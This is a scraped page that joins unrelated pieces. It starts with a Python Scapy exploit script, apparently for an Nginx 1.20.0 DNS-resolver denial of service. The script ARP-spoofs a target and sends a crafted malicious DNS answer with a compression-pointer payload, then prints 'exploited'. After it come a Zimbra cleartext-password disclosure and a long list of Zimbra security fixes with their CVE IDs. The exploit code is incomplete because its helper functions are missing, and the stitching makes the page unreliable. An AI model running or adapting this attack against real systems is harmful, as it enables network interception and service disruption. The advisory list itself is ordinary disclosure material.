1+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|             LENGTH            |               ID              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|            ANCOUNT            |            NSCOUNT            |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|            ARCOUNT            |               QD              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|               AN              |               NS              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|               AR              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+Fig. DNS                             """def process_received_packet(received_packet):    if received_packet[IP].src == target_ip:        if received_packet.haslayer(DNS):            if DNSQR in received_packet:                print("[*] the received packet: " + str(bytes_hex(received_packet)))                print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))                try:                    # \/    the received DNS request                    dns_request = received_packet[DNS].build()                    null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)                    print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))                    print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))                    payload = [                        dns_request[0:2],                        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",                        dns_request[12:null_pointer_index+1],                        dns_request[null_pointer_index+1:null_pointer_index+3],                        dns_request[null_pointer_index+3:null_pointer_index+5],                        b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",                        b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",                        b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",                        b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"                    ]                                        payload = b"".join(payload)                    spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\                        UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\                        payload)                    print("[+] dns answer: "+str(hexlify(payload)))                    print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))                    sendp(spoofed_pkt, count=1)                    print("\n[+] malicious answer was sent")                    print("[+] exploited\n")                except:                    print("\n[-] ERROR")def main():    global target_ip    parser = argparse.ArgumentParser()    parser.add_argument("-t", "--target", help="IP address of the target")    parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")    args = parser.parse_args()    target_ip = args.target    dns_server_ip = args.dns_server    device_setup()    processes_list = []    ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))    exploitProcess = Process(target=exploit,args=(target_ip,))    processes_list.append(ARPPProcess)    processes_list.append(exploitProcess)    for process in processes_list:        process.start()    for process in processes_list:        process.join()if __name__ == '__main__':    target_ip = ""    main()

Nginx 1.20.0 Denial Of Service

Zimbra Collaboration Open Source 8.8.15 does not encrypt the initial-login randomly created password (from the "zmprove ca" command). It is visible in cleartext on port UDP 514 (aka the syslog port).

The following Security Vulnerabilities have been fixed and released in recent versions of Zimbra Collaboration software. For the latest release and patches, please be sure to update your Zimbra Collaboration servers with the software available on our Download pages:

**Note**: only supported versions are referenced, however older unsupported versions often have the same vulnerabilities and should be upgraded to supported versions as soon as possible.  
_(going back to ZCS 7.1.3)_

Bug#

Summary

**CVE-ID**

**CVSS  
Score**

Zimbra  
Rating

Fix Release or  
Patch Version

Reporter

Memcached poisoning with unauthenticated request.

CVE-2022-27924

Medium

9.0.0 Patch 24, 8.8.15 Patch 31

Simon Scannell of Sonarsource

RCE through mboximport from authenticated user.

CVE-2022-27925

Medium

9.0.0 Patch 24, 8.8.15 Patch 31

Mikhail Klyuchnikov of Positive Technologies

Proxy Servlet Open Redirect Vulnerability

CVE-2021-35209

Medium

9.0.0 Patch 16, 8.8.15 Patch 23

Simon Scannell of Sonarsource

Open Redirect Vulnerability in preauth servlet

CVE-2021-34807

Low

9.0.0 Patch 16, 8.8.15 Patch 23

Simon Scannell of Sonarsource

Stored XSS Vulnerability in ZmMailMsgView.java

CVE-2021-35208

Medium

9.0.0 Patch 16, 8.8.15 Patch 23

Simon Scannell of Sonarsource

XSS vulnerability in Zimbra Web Client via loginErrorCode

CVE-2021-35207

Medium

9.0.0 Patch 16, 8.8.15 Patch 23

Heap-based buffer overflow vulnerabilities in PHP < 7.3.10

9.8

Critical

9.0.0 Patch 13

Upstream, see CVE-2019-9641, CVE-2019-9640

Heap-based buffer overflow vulnerabilities in PHP < 7.3.10

9.8

Critical

8.8.15 Patch 20

Upstream, see CVE-2019-9641, CVE-2019-9640

Upgraded Apache to 2.4.46 to avoid multiple vulnerabilities.

7.8

High

9.0.0 Patch 13

Upstream, see CVE-2019-0211, CVE-2019-0217

Upgraded Apache to 2.4.46 to avoid multiple vulnerabilities.

7.8

High

8.8.15 Patch 20

Upstream, see CVE-2019-0211, CVE-2019-0217

XXE (CWE-776) vulnerability in saml consumer store servlet (Network Edition)

CVE-2020-35123

Medium

9.0.0 Patch 10

Primerica

XXE (CWE-776) vulnerability in saml consumer store servlet (Network Edition)

CVE-2020-35123

Medium

8.8.15 Patch 17

Primerica

XSS CWE-79 vulnerability in tinymce

n/a

6.1

Medium

9.0.0 Patch 5

Upstream, see CVE-2019-1010091

Memory Leak in nodejs library mem

n/a

5.5

Medium

9.0.0 Patch 5

Upstream, see WS-2018-0236

Persistent XSS

CVE-2020-13653

Minor

8.8.15 Patch 11, 9.0.0 Patch 4

Telenet

Unrestricted Upload of File with Dangerous Type CWE-434

CVE-2020-12846

6.0

Minor

8.8.16 Patch 10, 9.0.0 Patch 3

Telenet

Persistent XSS CWE-79

CVE-2020-11737

4.3

Minor

9.0.0 Patch 2

Zimbra

109174

Non-Persistent XSS CWE-79

CVE-2019-12427

4.3

Minor

8.8.15 Patch 1

Meridian Miftari

109141

Non-Persistent XSS CWE-79

CVE-2019-15313

4.3

Minor

8.8.15 Patch 1

Quang Bui

109124

Non-Persistent XSS CWE-79

CVE-2019-8947

2.6

Minor

\-

Issam Rabhi of Sysdream

109123

Persistent XSS CWE-79

CVE-2019-8946

2.6

Minor

\-

Issam Rabhi of Sysdream

109122

Persistent XSS CWE-79

CVE-2019-8945

3.5

Minor

\-

Issam Rabhi of Sysdream

109117

Persistent XSS CWE-79

CVE-2019-11318

3.5

Minor

8.8.12 Patch 1

Mondher Smii

109127

SSRF CWE-918 / CWE-807

CVE-2019-9621

4.0

Minor

8.7.11 Patch11  
8.8.9 Patch10  
8.8.10 Patch8  
8.8.11 Patch4  
8.8.12

An Trinh

109096

Blind SSRF CWE-918

CVE-2019-6981

4.0

Minor

8.7.11 Patch11  
8.8.9 Patch10  
8.8.10 Patch8  
8.8.11 Patch4  
8.8.12

An Trinh

109129

XXE CWE-611  
(8.7.x only)

CVE-2019-9670

6.4

Major

8.7.11 Patch10

Khanh Van Pham  
An Trinh

109097

Insecure object deserialization CWE-502

CVE-2019-6980

5.4

Major

8.7.11 Patch9  
8.8.9 Patch10  
8.8.10 Patch7  
8.8.11 Patch3  
8.8.12

An Trinh

109093

XXE CWE-611

CVE-2018-20160

6.4

Major

8.7.x see 109129 above  
8.8.9 Patch9  
8.8.10 Patch5  
8.8.11 Patch1  
8.8.12

An Trinh

109017

Non-Persistent XSS CWE-79

CVE-2018-14013

4.3

Minor

8.7.11 Patch8  
8.8.9 Patch9  
8.8.10 Patch5  
8.8.11

Issam Rabhi of Sysdream

109020

Persistent XSS CWE-79

CVE-2018-18631

5.0

Major

8.7.11 Patch7  
8.8.9 Patch7  
8.8.10 Patch2  
8.8.11

Netragard

109018

Non-Persistent CWE-79

CVE-2018-14013

2.6

Minor

8.7.11 Patch7  
8.8.9 Patch6  
8.8.10 Patch1  
8.8.11

Issam Rabhi of Sysdream

109021

Limited Content Spoofing CWE-345

CVE-2018-17938

4.3

Minor

8.8.10

Sumit Sahoo

109012

Account Enumeration CWE-203

CVE-2018-15131

5.0

Major

8.7.11 Patch6  
8.8.8 Patch9  
8.8.9 Patch3

Danielle Deibler

108970

Persistent XSS CWE-79

CVE-2018-14425

3.5

Minor

8.8.8 Patch7  
8.8.9 Patch1

Diego Di Nardo

108902

Persistent XSS CWE-79

CVE-2018-10939

3.5

Minor

8.6.0 Patch11  
8.7.11 Patch4  
8.8.8 Patch4

Diego Di Nardo

108963

Verbose Error Messages CWE-209

CVE-2018-10950

3.5

Minor

8.7.11 Patch3  
8.8.8

Netragard

108962

Account Enumeration CWE-203

CVE-2018-10949

5.0

Major

8.7.11 Patch3  
8.8.8

Netragard

108894

Persistent XSS CWE-199

CVE-2018-10951

3.6

Minor

8.6.0 Patch10  
8.7.11 Patch3  
8.8.8

Netragard

97579

CSRF CWE-352

CVE-2015-7610

5.8

Major

8.6.0 Patch10  
8.7.11 Patch2  
8.8.8 Patch1

Fortinet's FortiGuard Labs

108786

Persistent XSS CWE-79

CVE-2018-6882

4.3

Minor

8.6.0 Patch10  
8.7.11 Patch1  
8.8.7  
8.8.8

Stephan Kaag of Securify

108265

Persistent XSS CWE-79

CVE-2017-17703

4.3

Minor

8.6.0 Patch9  
8.7.11 Patch1  
8.8.3

Veit Hailperin

107963

Host header injection CWE-20

\-

4.3

Minor

8.8.0 Beta2

\-

107948

107949

Persistent XSS CWE-79

CVE-2018-10948

3.5

Minor

8.6.0 Patch10  
8.7.11 Patch3  
8.8.0 Beta2

Lucideus  
Phil Pearl

107925

Persistent XSS - snippet CWE-79

CVE-2017-8802

3.5

Minor

8.6.0 Patch9  
8.7.11 Patch1  
8.8.0 Beta2

Compass Security

107878

Persistent XSS - location CWE-79

CVE-2017-8783

4.0

Minor

8.7.10

Stephan Kaag of Securify

107712

Improper limitation of file paths CWE-22

CVE-2017-6821

4.0

Minor

8.7.6

Greg Solovyev, Phil Pearl

107684

Improper handling of privileges CWE-280

CVE-2017-6813

4.0

Major

8.6.0 Patch9  
8.7.6

Greg Solovyev

106811

XXE CWE-611

CVE-2016-9924

5.8

Major

8.6.0 Patch10  
8.7.4

Alastair Gray

106612

Persistent XSS CWE-79

CVE-2017-7288

4.3

Minor

8.6.0 Patch11  
8.7.1

Sammy Forgit

105001  
105174

XSS CWE-79

CVE-2016-5721

4.3  
2.1

Minor

8.6.0 Patch11  
8.7.0

Secu

104552  
104703

XSS CWE-79

CVE-2016-3999

4.3

Minor

8.7.0

Nam Habach

104477

Open Redirect CWE-601

CVE-2016-4019

4.3

Minor

8.7.0

Zimbra

104294  
104456

CSRF CWE-352

CVE-2016-3406

2.6

Minor

8.6.0 Patch8  
8.7.0

Zimbra

104222

104910  
105071  

105175

XSS CWE-79

CVE-2016-3407

4.3  
3.5  
4.3  
2.1

Minor

8.6.0 Patch11  
8.7.0

Zimbra

103997

104413  
104414  
104777  

104791

XSS CWE-79

CVE-2016-3412

3.5

Minor

8.7.0

Zimbra

103996

XXE (Admin) CWE-611\-

CVE-2016-3413

2.6

Minor

8.6.0 Patch11  
8.7.0

Zimbra

103961  
104828

CSRF CWE-352

CVE-2016-3405

4.3

Minor

8.6.0 Patch8  
8.7.0

Zimbra

103959

CSRF CWE-352

CVE-2016-3404

4.3

Minor

8.6.0 Patch8  
8.7.0

Zimbra

103956

103995  
104475  
104838  

104839

XSS CWE-79

CVE-2016-3410

4.3

Minor

8.6.0 Patch11  
8.7.0

Zimbra

103609

XSS CWE-79

CVE-2016-3411

3.5

Minor

8.6.0 Patch11  
8.7.0

Zimbra

102637

XSS CWE-79

CVE-2016-3409

4.3

Minor

8.6.0 Patch11  
8.7.0

Peter Nguyen

102276

Deserialization of Untrusted Data CWE-502

CVE-2016-3415

5.8

Major

8.7.0

Zimbra

102227

Deserialization of Untrusted Data CWE-502

n/a

7.5

Major

8.7.0

Upstream, see  
CVE-2015-4852

102029

CWE-674

CVE-2016-3414

4.0

Minor

8.6.0 Patch7  
8.7.0

Zimbra

101813

XSS CWE-79

CVE-2016-3408

4.3

Minor

8.6.0 Patch11  
8.7.0

Volexity

100885  
100899

CSRF CWE-352

CVE-2016-3403

5.8

Major

8.6.0 Patch8  
8.7.0

Sysdream

99810

CWE-284 CWE-203

CVE-2016-3401

3.5

Minor

8.7.0

Zimbra

99167

Account Enumeration CWE-203

CVE-2016-3402

2.6

Minor

8.7.0

Zimbra

101435  
101436

Persistent XSS CWE-79

CVE-2015-7609

6.4  
2.3

Major

8.6.0 Patch5  
8.7.0

Fortinet's FortiGuard Labs

101559

100133  
99854  
99914  

96973

XSS CWE-79

CVE-2015-2249

3.5

Minor

8.6.0 Patch5  
8.7.0

Zimbra

99236

XSS Vuln in YUI components in ZCS

n/a

4.3

Minor

8.6.0 Patch5

Upstream, see  
CVE-2012-5881  
CVE-2012-5882  
CVE-2012-5883

98358

98216  

98215

Non-Persistent XSS CWE-79

CVE-2015-2249

4.3

Minor

8.6.0 Patch2  
8.7.0

Cure53

97625

Non-Persistent XSS CWE-79

CVE-2015-2230

3.5

Minor

8.6.0 Patch2

MWR InfoSecurity

96105

Improper Input Validation CWE-20

CVE-2014-8563

5.8

Major

8.0.9  
8.5.1  
8.6.0

 -

83547

CSRF Vulnerability CWE-352

CVE-2015-6541

5.8

Major

8.5.0

iSEC Partners, Sysdream

87412

92825  
92833  

92835

XSS Vulnerabilities CWE-79  
(8.0.7 Patch  
contains 87412)

CVE-2014-5500

4.3

Minor

8.0.8  
8.5.0

 -

83550

Session Fixation CWE-384

CVE-2013-5119

5.8

Major

8.5.0

\- 

91484

Patch ZCS8 OpenSSL for CVE-2014-0224

n/a

6.8

Major

8.0.3+Patch  
8.0.4+Patch  
8.0.5+Patch  
8.0.6+Patch  
8.0.7+Patch

Upstream, see  
CVE-2014-0224

88708

Patch ZCS8 OpenSSL for CVE-2014-0160

n/a

5.0

Major

8.0.3+Patch  
8.0.4+Patch  
8.0.5+Patch  
8.0.6+Patch  
8.0.7+Patch  
8.0.7

Upstream, see  
CVE-2014-0160

85499

Upgrade to OpenSSL 1.0.1f

n/a

4.3  
4.3  
5.8

Major

8.0.7

Upstream, see  
CVE-2013-4353  
CVE-2013-6449  
CVE-2013-6450

84547

XXE CWE-611

CVE-2013-7217

6.4  
(not 10.0)

Critical

7.2.2\_Patch3  
7.2.3\_Patch  
7.2.4\_Patch2  
7.2.5\_Patch  
7.2.6  
8.0.3\_Patch3  
8.0.4\_Patch2  
8.0.5\_Patch  
8.0.6

Private

85478

XSS vulnerability in message view

\-

6.4

Major

8.0.7

Alban Diquet  
of iSEC Partners

85411

Local root privilege escalation

\-

6.2

Major

8.0.7

Matthew David

85000

Patch nginx for CVE-2013-4547

n/a

7.5

Major

7.2.7  
8.0.7

Upstream, see  
CVE-2013-4547

80450  
80131  
80445  
80132

Upgrade to JDK 1.6 u41  
Upgrade OpenSSL to 1.0.0k  
Upgrade to JDK 1.7u15+  
Upgrade to OpenSSL 1.0.1d

n/a

2.6

Minor

7.2.3  
7.2.3  
8.0.3  
8.0.3

Upstream, see  
CVE-2013-0169

80338

Local file inclusion via skin/branding feature CWE-22

CVE-2013-7091

5.0

Critical

6.0.16\_Patch  
7.1.1\_Patch6  
7.1.3\_Patch3  
7.2.2\_Patch2  
7.2.3  
8.0.2\_Patch  
8.0.3

Private

77655

Separate keystore for CAs used for X509 authentication

\-

5.8

Major

8.0.7

Private

75424

Upgrade to Clamav 0.97.5

n/a

4.3  
4.3  
4.3

Minor

7.2.1

Upstream, see  
CVE-2012-1457  
CVE-2012-1458  
CVE-2012-1459

64981

Do not allow HTTP GET for login

\-

6.8

Major

7.1.3\_Patch  
7.1.4

Private

Tag

#nginx